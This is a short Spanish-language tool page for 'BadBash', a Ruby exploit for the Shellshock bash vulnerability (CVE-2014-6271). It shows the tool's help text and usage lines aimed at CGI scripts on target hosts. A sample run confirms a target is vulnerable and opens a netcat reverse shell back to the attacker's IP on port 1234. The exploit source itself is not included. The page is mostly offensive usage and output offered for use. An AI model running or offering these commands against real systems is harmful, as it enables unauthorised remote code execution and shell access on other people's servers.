
Herramienta RCE CVE-2014-6271
BadBash es una herramienta de explotación RCE para CVE-2014-6271. La versión básica solo verifica el sitio CGI HTTP y solo proporciona una shell inversa de netcat en el puerto 1234.
Desarrollador : Andy Yang Versión : 0.1.0 Licencia : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Herramienta RCE CVE-2014-6271 por Andy Yang La versión básica solo verifica el sitio HTTP La versión básica solo proporciona una shell inversa de netcat en el puerto 1234
EJEMPLO DE USO:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Ruta CGI objetivo Ruta completa de la página CGI
-d, --IP de destino Tu dirección IP que escucha una conexión entrante
-h, --help Muestra ayuda
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Verificando si el objetivo es vulnerable........
[Info] Esto puede tomar hasta 10 segundos........
[Info] ¡El objetivo es vulnerable!!!
[Info] Por favor usa NC para escuchar en el puerto 1234 para la shell inversa..........
[Info] Explotando para una shell inversa que se conecte a 172.16.189.1:1234 vía netcat ..........